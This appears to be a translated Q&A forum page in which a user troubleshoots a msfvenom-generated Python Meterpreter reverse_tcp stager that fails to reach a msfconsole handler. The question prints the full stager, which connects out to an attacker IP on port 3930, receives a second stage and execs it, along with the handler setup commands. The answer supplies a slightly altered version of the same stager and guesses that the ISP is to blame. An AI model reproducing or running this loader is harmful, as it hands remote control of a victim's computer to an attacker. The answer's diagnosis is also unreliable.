0

我曾经msfvenom创建过以下 python 有效负载:

import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})

然后我打开了msfconsole,并做了以下事情:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit

它在 192.168.0.186:3930 上启动反向 TCP 处理程序,并启动有效负载处理程序。但是,当我在另一台计算机上运行脚本时,负载在等待大约一分钟后超时,并且 msfconsole 没有注册任何内容。我在路由器上转发了 3930 端口。我在这里做错了什么?

4

1 回答 1

0

这是我将用于 Unix 系统上的反向 TCP 的代码,其中包含您提供的详细信息。然而,我在错误搜索后偶然发现了你的帖子,所以这不是 100% 完美的。过去我已经让它完美地工作,但就在最近它开始滞后。它会在内部系统上运行一次,但之后的任何事情都会给我你得到的同样的错误信息。通过 WAN(而不是 LAN)执行此操作时,我也会收到相同的消息,但是它不是第一次运行。你有什么ISP?它可能完全依赖于此。

import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
于 2016-09-26T03:58:39.813 回答